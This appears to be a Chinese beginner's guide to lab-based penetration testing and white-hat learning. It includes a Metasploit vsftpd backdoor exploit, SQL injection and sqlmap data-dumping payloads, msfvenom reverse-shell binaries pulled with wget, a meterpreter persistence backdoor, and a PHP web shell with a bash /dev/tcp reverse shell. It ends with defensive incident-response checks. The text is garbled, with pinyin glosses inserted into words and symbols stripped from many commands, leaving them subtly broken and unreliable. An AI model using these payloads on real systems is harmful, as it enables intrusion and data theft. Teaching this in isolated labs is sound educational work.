絡(luò)安全入門(mén)指南:從零開(kāi)始學(xué)習(xí)滲透測(cè)試與白帽黑客技能)
最近在后臺(tái)收到不少私信很多同學(xué)對(duì)網(wǎng)絡(luò)安全和滲透測(cè)試技術(shù)充滿(mǎn)好奇想利用假期系統(tǒng)學(xué)習(xí)但面對(duì)網(wǎng)上零散、過(guò)時(shí)甚至誤導(dǎo)性的“黑客教程”感到無(wú)從下手。本文旨在為真正有志于從事網(wǎng)絡(luò)安全領(lǐng)域通常被稱(chēng)為“白帽黑客”或安全研究員的初學(xué)者提供一份清晰、合法、可落地的學(xué)習(xí)路線與實(shí)戰(zhàn)入門(mén)指南。我們將完全在合法授權(quán)的環(huán)境下使用虛擬機(jī)、靶場(chǎng)和開(kāi)源工具學(xué)習(xí)如何像安全專(zhuān)家一樣思考、分析和防御。請(qǐng)注意本文所有內(nèi)容均基于授權(quán)測(cè)試和教育目的任何未經(jīng)授權(quán)的網(wǎng)絡(luò)探測(cè)、系統(tǒng)入侵行為都是非法的。我們的目標(biāo)是培養(yǎng)防御能力保護(hù)系統(tǒng)安全。1. 重新認(rèn)識(shí)“黑客”從概念到職業(yè)路徑在開(kāi)始技術(shù)學(xué)習(xí)前必須建立正確的認(rèn)知?!昂诳汀币辉~在媒體渲染下已嚴(yán)重污名化。在技術(shù)社區(qū)它最初指的是熱衷于探索系統(tǒng)細(xì)節(jié)、提升技術(shù)能力的人。我們今天要學(xué)習(xí)的是網(wǎng)絡(luò)安全工程師或滲透測(cè)試工程師的技能。1.1 白帽、灰帽與黑帽白帽黑客 (White Hat)也稱(chēng)為道德黑客或滲透測(cè)試員。他們受雇于組織在獲得明確授權(quán)的前提下模擬攻擊者的手段來(lái)發(fā)現(xiàn)系統(tǒng)漏洞并協(xié)助修復(fù)。這是合法的、受尊敬的職業(yè)。黑帽黑客 (Black Hat)以非法入侵、破壞、竊取數(shù)據(jù)或牟利為目的的攻擊者。其行為觸犯法律?;颐焙诳?(Grey Hat)游走于法律邊緣可能未經(jīng)授權(quán)發(fā)現(xiàn)漏洞并公開(kāi)意圖介于提醒和炫耀之間。這種行為風(fēng)險(xiǎn)極高不推薦。我們的學(xué)習(xí)目標(biāo)非常明確成為一名白帽黑客。1.2 核心技能樹(shù)概覽一名合格的網(wǎng)絡(luò)安全工程師需要復(fù)合型知識(shí)結(jié)構(gòu)絕非只會(huì)使用幾個(gè)攻擊工具。其核心技能樹(shù)通常包括網(wǎng)絡(luò)基礎(chǔ)TCP/IP協(xié)議棧、HTTP/HTTPS、DNS、路由與交換等。操作系統(tǒng)深入理解Linux特別是Kali、Parrot等安全發(fā)行版和Windows系統(tǒng)管理、進(jìn)程、服務(wù)、日志。編程與腳本至少掌握一門(mén)腳本語(yǔ)言如Python、Bash用于自動(dòng)化任務(wù)理解Web開(kāi)發(fā)HTML、JavaScript、PHP/Java/Python后端以分析漏洞。數(shù)據(jù)庫(kù)知識(shí)SQL語(yǔ)言及數(shù)據(jù)庫(kù)如MySQL、MariaDB的基本操作這是理解SQL注入的基礎(chǔ)。安全工具與框架熟悉主流滲透測(cè)試框架如Metasploit、漏洞掃描器如Nessus、OpenVAS、代理工具如Burp Suite等。漏洞原理與利用理解OWASP Top 10等常見(jiàn)漏洞如注入、跨站腳本、失效的訪問(wèn)控制的產(chǎn)生機(jī)制、利用方式和修復(fù)方案。防御與審計(jì)了解防火墻、WAF、IDS/IPS、SIEM等防御技術(shù)以及安全策略、日志分析和應(yīng)急響應(yīng)流程。2. 學(xué)習(xí)環(huán)境搭建安全的“練兵場(chǎng)”在真實(shí)網(wǎng)絡(luò)中練習(xí)是絕對(duì)禁止的。我們必須搭建一個(gè)完全隔離的本地實(shí)驗(yàn)環(huán)境。2.1 虛擬機(jī)與靶場(chǎng)我們將使用虛擬機(jī)軟件創(chuàng)建多個(gè)虛擬機(jī)組網(wǎng)模擬攻擊方、防守方和目標(biāo)系統(tǒng)。環(huán)境準(zhǔn)備清單主機(jī)操作系統(tǒng)Windows 10/11 或 macOS 或 Linux本文以Windows為例。虛擬機(jī)軟件VMware Workstation Player免費(fèi)或 VirtualBox免費(fèi)。本文使用VMware。攻擊機(jī)系統(tǒng)Kali Linux。這是最流行的滲透測(cè)試專(zhuān)用發(fā)行版預(yù)裝了數(shù)百種安全工具。下載從官方鏡像站下載Kali Linux VMware鏡像.ova或.vmx格式直接導(dǎo)入即可省去安裝步驟。靶機(jī)系統(tǒng)用于練習(xí)的脆弱系統(tǒng)。Metasploitable2/3故意設(shè)計(jì)存在大量漏洞的Linux/Windows靶機(jī)非常適合入門(mén)。DVWA (Damn Vulnerable Web Application)一個(gè)充滿(mǎn)漏洞的PHP/MySQL Web應(yīng)用可在虛擬機(jī)中搭建。OWASP Juice Shop一個(gè)現(xiàn)代化的、包含所有OWASP Top 10漏洞的Node.js Web應(yīng)用。2.2 環(huán)境搭建步驟步驟1安裝VMware并導(dǎo)入Kali從VMware官網(wǎng)下載并安裝VMware Workstation Player。下載Kali Linux VMware鏡像例如kali-linux-2024.x-vmware-amd64.7z解壓。打開(kāi)VMware選擇“打開(kāi)虛擬機(jī)”找到解壓后的.vmx文件打開(kāi)。啟動(dòng)Kali虛擬機(jī)默認(rèn)用戶(hù)名kali密碼kali。步驟2配置網(wǎng)絡(luò)關(guān)鍵為了讓攻擊機(jī)Kali能訪問(wèn)靶機(jī)需要將它們的網(wǎng)絡(luò)模式設(shè)置為同一網(wǎng)段。在VMware中將Kali和后續(xù)創(chuàng)建的靶機(jī)的網(wǎng)絡(luò)適配器都設(shè)置為“NAT模式”或“僅主機(jī)模式”。NAT模式虛擬機(jī)可以訪問(wèn)外網(wǎng)主機(jī)和虛擬機(jī)之間可以互相訪問(wèn)。適合需要更新軟件包的場(chǎng)景。僅主機(jī)模式虛擬機(jī)與主機(jī)組成一個(gè)封閉的私有網(wǎng)絡(luò)無(wú)法訪問(wèn)外網(wǎng)。更安全。啟動(dòng)Kali打開(kāi)終端輸入ip a或ifconfig查看IP地址如192.168.xxx.xxx。記下這個(gè)IP。步驟3部署第一個(gè)靶機(jī)Metasploitable2下載Metasploitable2的VMware鏡像文件。在VMware中打開(kāi)該鏡像。啟動(dòng)Metasploitable2虛擬機(jī)。默認(rèn)用戶(hù)名msfadmin密碼msfadmin。在Metasploitable2終端中輸入ifconfig查看其IP地址應(yīng)與Kali在同一網(wǎng)段如192.168.xxx.yyy。在Kali的終端中使用ping命令測(cè)試連通性ping -c 4 192.168.xxx.yyy如果收到回復(fù)說(shuō)明環(huán)境搭建成功。至此你的“網(wǎng)絡(luò)實(shí)驗(yàn)室”就準(zhǔn)備好了Kali攻擊方和 Metasploitable2防守方/目標(biāo)。3. 第一步信息收集與偵察在授權(quán)測(cè)試中信息收集是耗時(shí)最長(zhǎng)、也最關(guān)鍵的一步。目標(biāo)是盡可能多地了解目標(biāo)縮小攻擊面。3.1 被動(dòng)信息收集不直接與目標(biāo)交互利用公開(kāi)資源。Whois查詢(xún)獲取域名注冊(cè)人、郵箱、電話、DNS服務(wù)器等信息。# 在Kali終端中 whois example.com搜索引擎技巧使用Google Dorking語(yǔ)法。site:example.com搜索特定站點(diǎn)。filetype:pdf site:example.com搜索站點(diǎn)上的PDF文件。intitle:index of parent directory尋找開(kāi)放目錄。3.2 主動(dòng)信息收集直接與目標(biāo)系統(tǒng)交互。主機(jī)發(fā)現(xiàn)找出網(wǎng)絡(luò)中存活的主機(jī)。# 使用nmap進(jìn)行ping掃描-sn 不進(jìn)行端口掃描 sudo nmap -sn 192.168.xxx.0/24端口掃描確定目標(biāo)開(kāi)放了哪些服務(wù)。# 對(duì)目標(biāo)IP進(jìn)行全端口掃描-p-并嘗試識(shí)別服務(wù)版本-sV sudo nmap -sV -p- 192.168.xxx.yyy示例輸出解讀PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 2.3.4 22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0) 80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2) 3306/tcp open mysql MySQL 5.0.51a-3ubuntu5從掃描結(jié)果可知目標(biāo)開(kāi)放了FTP、SSH、Web和MySQL服務(wù)并且版本信息可能對(duì)應(yīng)著已知的漏洞。4. 漏洞掃描與利用初探發(fā)現(xiàn)服務(wù)后下一步是尋找其可能存在的漏洞。4.1 使用Nmap腳本引擎Nmap不僅用于掃描其腳本引擎NSE能進(jìn)行簡(jiǎn)單的漏洞檢測(cè)。# 使用默認(rèn)的漏洞檢測(cè)腳本掃描目標(biāo) sudo nmap --script vuln 192.168.xxx.yyy這個(gè)命令會(huì)運(yùn)行所有分類(lèi)為“vuln”的腳本檢測(cè)常見(jiàn)漏洞。4.2 初識(shí)Metasploit框架Metasploit是功能最強(qiáng)大的滲透測(cè)試框架。我們用它來(lái)利用一個(gè)已知漏洞。場(chǎng)景我們通過(guò)Nmap發(fā)現(xiàn)Metasploitable2的VSFTPD 2.3.4服務(wù)存在一個(gè)著名的后門(mén)漏洞CVE-2011-2523。利用步驟啟動(dòng)Metasploit控制臺(tái)sudo msfconsole搜索漏洞利用模塊msf6 search vsftpd 2.3.4會(huì)顯示一個(gè)名為exploit/unix/ftp/vsftpd_234_backdoor的模塊。使用該模塊msf6 use exploit/unix/ftp/vsftpd_234_backdoor查看并設(shè)置模塊選項(xiàng)msf6 exploit(unix/ftp/vsftpd_234_backdoor) show options可以看到需要設(shè)置RHOSTS目標(biāo)IP。msf6 exploit(unix/ftp/vsftpd_234_backdoor) set RHOSTS 192.168.xxx.yyy執(zhí)行攻擊msf6 exploit(unix/ftp/vsftpd_234_backdoor) exploit如果成功你會(huì)獲得一個(gè)命令執(zhí)行shell通常是一個(gè)root權(quán)限的shell這意味著你完全控制了這臺(tái)服務(wù)器。重要提醒在獲得shell后絕對(duì)不要在非授權(quán)目標(biāo)上進(jìn)行任何破壞性操作如刪除文件、加密數(shù)據(jù)。在實(shí)驗(yàn)環(huán)境中你可以輸入exit或background退出當(dāng)前會(huì)話。5. Web安全入門(mén)以SQL注入為例Web應(yīng)用是當(dāng)前最主要的攻擊面之一。SQL注入是長(zhǎng)期位居OWASP Top 10的嚴(yán)重漏洞。5.1 SQL注入原理當(dāng)Web應(yīng)用將用戶(hù)輸入如登錄表單中的用戶(hù)名直接拼接到SQL查詢(xún)語(yǔ)句中而沒(méi)有進(jìn)行過(guò)濾或轉(zhuǎn)義時(shí)攻擊者就可以構(gòu)造特殊的輸入來(lái)改變?cè)璖QL語(yǔ)句的邏輯從而竊取、篡改或刪除數(shù)據(jù)庫(kù)數(shù)據(jù)。正常登錄查詢(xún)SELECT * FROM users WHERE username admin AND password 123456;惡意輸入在用戶(hù)名框輸入admin --注意最后有個(gè)空格。拼接后的查詢(xún)變?yōu)镾ELECT * FROM users WHERE username admin -- AND password xxx;--在SQL中是注釋符它使得后面的密碼檢查條件失效。攻擊者只需知道用戶(hù)名admin無(wú)需密碼即可登錄。5.2 手動(dòng)檢測(cè)與利用基于DVWA靶場(chǎng)在實(shí)驗(yàn)環(huán)境中搭建DVWA過(guò)程略。將DVWA安全級(jí)別設(shè)置為“Low”。進(jìn)入“SQL Injection”頁(yè)面。檢測(cè)在輸入框輸入1一個(gè)數(shù)字加一個(gè)單引號(hào)。如果頁(yè)面返回?cái)?shù)據(jù)庫(kù)錯(cuò)誤信息則存在SQL注入漏洞。判斷列數(shù)使用ORDER BY子句猜測(cè)查詢(xún)結(jié)果的列數(shù)。輸入1 ORDER BY 1 -- 輸入1 ORDER BY 2 -- ... 直到頁(yè)面報(bào)錯(cuò)假設(shè)在 ORDER BY 5 時(shí)報(bào)錯(cuò)則說(shuō)明有4列。聯(lián)合查詢(xún)獲取數(shù)據(jù)使用UNION SELECT語(yǔ)句。輸入1 UNION SELECT 1,2,3,4 --觀察頁(yè)面哪個(gè)位置顯示了數(shù)字如2和3這些位置可以用來(lái)回顯我們想查詢(xún)的數(shù)據(jù)。獲取數(shù)據(jù)庫(kù)信息輸入1 UNION SELECT 1, database(), user(), version() --頁(yè)面會(huì)顯示當(dāng)前數(shù)據(jù)庫(kù)名、數(shù)據(jù)庫(kù)用戶(hù)和版本信息。獲取表名和列名利用數(shù)據(jù)庫(kù)的元數(shù)據(jù)information_schema。-- 獲取所有表名 輸入1 UNION SELECT 1,table_name,3,4 FROM information_schema.tables WHERE table_schemadatabase() -- -- 假設(shè)發(fā)現(xiàn) users 表獲取其列名 輸入1 UNION SELECT 1,column_name,3,4 FROM information_schema.columns WHERE table_nameusers --拖取數(shù)據(jù)-- 獲取 users 表中的 user 和 password 列數(shù)據(jù) 輸入1 UNION SELECT 1,user,password,4 FROM users --你可能會(huì)看到經(jīng)過(guò)MD5哈希的密碼可以通過(guò)在線彩虹表進(jìn)行破解。5.3 自動(dòng)化工具SQLmap手動(dòng)注入繁瑣且容易出錯(cuò)可以使用神器SQLmap進(jìn)行自動(dòng)化檢測(cè)和利用。# 基本檢測(cè) sqlmap -u http://靶機(jī)IP/dvwa/vulnerabilities/sqli/?id1SubmitSubmit --cookiePHPSESSID你的會(huì)話ID; securitylow # 獲取所有數(shù)據(jù)庫(kù)名 sqlmap -u URL --cookieCOOKIE --dbs # 獲取指定數(shù)據(jù)庫(kù)的所有表 sqlmap -u URL --cookieCOOKIE -D dvwa --tables # 獲取指定表的所有列 sqlmap -u URL --cookieCOOKIE -D dvwa -T users --columns # 拖取數(shù)據(jù) sqlmap -u URL --cookieCOOKIE -D dvwa -T users -C user,password --dump注意使用--cookie參數(shù)是因?yàn)镈VWA需要登錄后才能訪問(wèn)漏洞頁(yè)面。在實(shí)際授權(quán)測(cè)試中務(wù)必確保擁有合法權(quán)限。6. 漏洞利用進(jìn)階獲取與維持訪問(wèn)權(quán)限單純利用一個(gè)漏洞可能只獲得一個(gè)臨時(shí)shell。為了深入測(cè)試需要建立更穩(wěn)固的訪問(wèn)通道。6.1 生成Payload與監(jiān)聽(tīng)使用MsfvenomMetasploit的Payload生成器創(chuàng)建反向Shell。# 生成一個(gè)Linux x64的反向TCP Shell的二進(jìn)制文件 sudo msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST你的Kali_IP LPORT4444 -f elf -o shell.elf # 生成一個(gè)Windows exe的反向TCP Shell sudo msfvenom -p windows/meterpreter/reverse_tcp LHOST你的Kali_IP LPORT4444 -f exe -o shell.exeLHOST監(jiān)聽(tīng)主機(jī)的IP你的Kali IP。LPORT監(jiān)聽(tīng)端口。-f輸出格式。-o輸出文件名。6.2 上傳并執(zhí)行Payload假設(shè)我們已經(jīng)通過(guò)之前的VSFTPD漏洞獲得了目標(biāo)Metasploitable2的一個(gè)基礎(chǔ)shell。在Kali上開(kāi)啟一個(gè)HTTP服務(wù)方便目標(biāo)下載Payload。sudo python3 -m http.server 80在目標(biāo)的shell中下載Payload。# 在Metasploitable2的shell中執(zhí)行 wget http://你的Kali_IP/shell.elf chmod x shell.elf在Kali上啟動(dòng)Metasploit監(jiān)聽(tīng)。msf6 use exploit/multi/handler msf6 exploit(multi/handler) set PAYLOAD linux/x64/meterpreter/reverse_tcp msf6 exploit(multi/handler) set LHOST 你的Kali_IP msf6 exploit(multi/handler) set LPORT 4444 msf6 exploit(multi/handler) exploit回到目標(biāo)shell執(zhí)行Payload。./shell.elf如果一切正常你會(huì)在Metasploit控制臺(tái)看到一個(gè)新的meterpreter會(huì)話建立。Meterpreter是一個(gè)功能強(qiáng)大的高級(jí)Payload提供了文件系統(tǒng)操作、截圖、鍵盤(pán)記錄、權(quán)限提升等模塊。6.3 權(quán)限提升與持久化獲得初始訪問(wèn)后權(quán)限可能很低如www-data用戶(hù)。我們需要嘗試提升到root。本地漏洞利用在Meterpreter會(huì)話中使用post/multi/recon/local_exploit_suggester模塊自動(dòng)建議可能適用的本地提權(quán)漏洞。meterpreter run post/multi/recon/local_exploit_suggester持久化為了在目標(biāo)重啟后仍能保持訪問(wèn)可以安裝后門(mén)。meterpreter run persistence -X -i 10 -p 4444 -r 你的Kali_IP-X系統(tǒng)啟動(dòng)時(shí)自動(dòng)運(yùn)行。-i回連間隔秒。-p回連端口。-r回連IP。再次強(qiáng)調(diào)這些操作僅限在你自己完全控制的實(shí)驗(yàn)靶機(jī)上進(jìn)行。7. 防御視角如何發(fā)現(xiàn)并應(yīng)對(duì)入侵真正的安全專(zhuān)家不僅要懂攻擊更要懂防御。我們模擬一個(gè)攻擊后的現(xiàn)場(chǎng)學(xué)習(xí)如何排查。7.1 攻擊痕跡分析基于Linux假設(shè)你是管理員懷疑服務(wù)器被入侵可以檢查以下位置用戶(hù)與組檢查是否有異常用戶(hù)被創(chuàng)建。cat /etc/passwd cat /etc/shadow進(jìn)程與網(wǎng)絡(luò)連接查找可疑進(jìn)程和網(wǎng)絡(luò)連接。ps aux | grep -E (shell|elf|\.\/|wget|curl|nc|ncat|socat) netstat -tulnp ss -tulnp # 更現(xiàn)代的替代命令 lsof -i :4444 # 查看誰(shuí)在使用4444端口計(jì)劃任務(wù)攻擊者常利用cron進(jìn)行持久化。crontab -l # 查看當(dāng)前用戶(hù)的cron ls -la /etc/cron* # 查看系統(tǒng)cron目錄 cat /etc/crontab啟動(dòng)項(xiàng)ls -la /etc/init.d/ ls -la /etc/systemd/system/歷史命令查看攻擊者可能執(zhí)行過(guò)的命令。history cat ~/.bash_history文件系統(tǒng)改動(dòng)查找近期被修改的可疑文件。find / -type f -mtime -2 2/dev/null # 查找2天內(nèi)修改過(guò)的文件 find / -name *.elf -o -name *.py -o -name *.sh 2/dev/null | grep -v /proc/ | grep -v /sys/7.2 應(yīng)急響應(yīng)初步流程隔離立即將受影響主機(jī)從網(wǎng)絡(luò)中斷開(kāi)拔網(wǎng)線或防火墻阻斷防止橫向移動(dòng)。取證對(duì)內(nèi)存和磁盤(pán)進(jìn)行鏡像備份以備后續(xù)法律或深度分析之用。使用dd或dcfldd工具。分析基于上述命令收集信息確定入侵時(shí)間、入口點(diǎn)、影響的系統(tǒng)/數(shù)據(jù)、攻擊者使用的工具和手法。清除與恢復(fù)從備份中恢復(fù)干凈的系統(tǒng)并修補(bǔ)導(dǎo)致入侵的漏洞如更新VSFTPD、修復(fù)SQL注入點(diǎn)。加固實(shí)施最小權(quán)限原則、配置防火墻、安裝HIDS主機(jī)入侵檢測(cè)系統(tǒng)、加強(qiáng)日志監(jiān)控等。8. 實(shí)戰(zhàn)演練一個(gè)簡(jiǎn)單的CTF挑戰(zhàn)讓我們綜合運(yùn)用所學(xué)知識(shí)解決一個(gè)簡(jiǎn)化版的CTFCapture The Flag題目這能極大鍛煉實(shí)戰(zhàn)能力。場(chǎng)景你獲得了一臺(tái)靶機(jī)的IP192.168.1.100目標(biāo)是找到隱藏在其中的“flag”通常是一段字符串。步驟指南信息收集使用nmap掃描靶機(jī)發(fā)現(xiàn)開(kāi)放了80端口HTTP和22端口SSH。Web目錄枚舉使用gobuster或dirb掃描網(wǎng)站目錄。gobuster dir -u http://192.168.1.100 -w /usr/share/wordlists/dirb/common.txt發(fā)現(xiàn)/admin和/backup目錄。漏洞發(fā)現(xiàn)訪問(wèn)/admin是一個(gè)登錄頁(yè)面。嘗試萬(wàn)能密碼admin --進(jìn)行SQL注入失敗。查看頁(yè)面源代碼發(fā)現(xiàn)注釋提示!-- TODO: Remove test page /test.php --。訪問(wèn)/test.php發(fā)現(xiàn)一個(gè)文件上傳功能但只允許上傳圖片.jpg, .png。文件上傳繞過(guò)使用Burp Suite攔截上傳請(qǐng)求將文件名shell.php改為shell.php.jpg然后在文件內(nèi)容開(kāi)頭添加圖片魔數(shù)如GIF89a后面跟上PHP代碼?php system($_GET[cmd]); ??;蛘咧苯有薷腂urp中請(qǐng)求的Content-Type為image/jpeg。上傳成功后訪問(wèn)/uploads/shell.php.jpg?cmdid如果返回了當(dāng)前用戶(hù)信息則說(shuō)明繞過(guò)成功獲得了命令執(zhí)行能力。獲取反向Shell在Kali上監(jiān)聽(tīng)nc -lvnp 4444通過(guò)Web Shell執(zhí)行命令下載一個(gè)反向Shell腳本或用一行命令建立連接。http://靶機(jī)IP/uploads/shell.php.jpg?cmdbash -c bash -i /dev/tcp/你的Kali_IP/4444 01權(quán)限提升與找Flag獲得一個(gè)低權(quán)限shell后嘗試提權(quán)。檢查是否有SUID權(quán)限的特殊文件。find / -perm -us -type f 2/dev/null或者查找包含“flag”關(guān)鍵詞的文件。find / -type f -name *flag* 2/dev/null find / -type f -exec grep -l flag{ {} \; 2/dev/null最終可能在/root/flag.txt或/home/某個(gè)用戶(hù)/flag.txt中找到flag。9. 學(xué)習(xí)路線與資源推薦一個(gè)暑假的時(shí)間可以打下堅(jiān)實(shí)的基礎(chǔ)。建議按以下路線循序漸進(jìn)第一階段基礎(chǔ)構(gòu)建2-3周網(wǎng)絡(luò)學(xué)習(xí)《TCP/IP詳解 卷1》理解三次握手、DNS、HTTP/S協(xié)議。Linux熟練使用命令行掌握文件管理、權(quán)限、進(jìn)程、網(wǎng)絡(luò)配置、包管理。編程學(xué)習(xí)Python基礎(chǔ)重點(diǎn)掌握socket編程、requests庫(kù)、正則表達(dá)式。工具安裝并熟悉Kali Linux的基本操作。第二階段Web安全核心3-4周理論深入研究OWASP Top 102021版每一個(gè)漏洞的原理、利用、防御。靶場(chǎng)在DVWA、bWAPP、WebGoat、OWASP Juice Shop上反復(fù)練習(xí)。工具精通Burp SuiteProxy, Repeater, Intruder, Scanner、SQLmap、Nmap。實(shí)踐嘗試在HackTheBox、TryHackMe的“Easy”難度機(jī)器上練習(xí)。第三階段系統(tǒng)與內(nèi)網(wǎng)3-4周系統(tǒng)漏洞學(xué)習(xí)Windows/Linux常見(jiàn)配置錯(cuò)誤和提權(quán)方法。密碼學(xué)了解哈希、加密、數(shù)字簽名在安全中的應(yīng)用與弱點(diǎn)。內(nèi)網(wǎng)滲透理解域環(huán)境、橫向移動(dòng)、票據(jù)傳遞等概念可通過(guò)TryHackMe相關(guān)房間學(xué)習(xí)??蚣苌钊雽W(xué)習(xí)Metasploit框架的模塊使用、Payload生成、免殺基礎(chǔ)。第四階段綜合與提升持續(xù)CTF比賽參加CTFtime上的在線CTF從Jeopardy類(lèi)題目開(kāi)始。漏洞研究關(guān)注安全社區(qū)如SecurityFocus、Exploit-DB嘗試復(fù)現(xiàn)公開(kāi)的漏洞。合規(guī)與標(biāo)準(zhǔn)了解滲透測(cè)試方法論如PTES、報(bào)告編寫(xiě)。認(rèn)證考慮學(xué)有余力可考慮OSCPOffensive Security Certified Professional認(rèn)證它是實(shí)踐能力的試金石。免費(fèi)資源平臺(tái)TryHackMe最適合新手的互動(dòng)學(xué)習(xí)平臺(tái)路徑清晰。HackTheBox包含大量真實(shí)難度的靶機(jī)適合進(jìn)階。PentesterLab提供專(zhuān)業(yè)的練習(xí)環(huán)境和課程。OverTheWire (Bandit)通過(guò)游戲?qū)W習(xí)Linux命令行和安全概念。PortSwigger Web Security Academy學(xué)習(xí)Web安全的絕佳免費(fèi)資源由Burp Suite廠商提供。技術(shù)之路沒(méi)有捷徑尤其是網(wǎng)絡(luò)安全領(lǐng)域需要持續(xù)的學(xué)習(xí)、大量的實(shí)踐和強(qiáng)烈的法律道德意識(shí)。這個(gè)暑假希望你以這份指南為起點(diǎn)在合法的實(shí)驗(yàn)環(huán)境中一步步構(gòu)建起自己的安全知識(shí)體系。記住最強(qiáng)的“黑客”技能最終是用來(lái)筑起防御的城墻。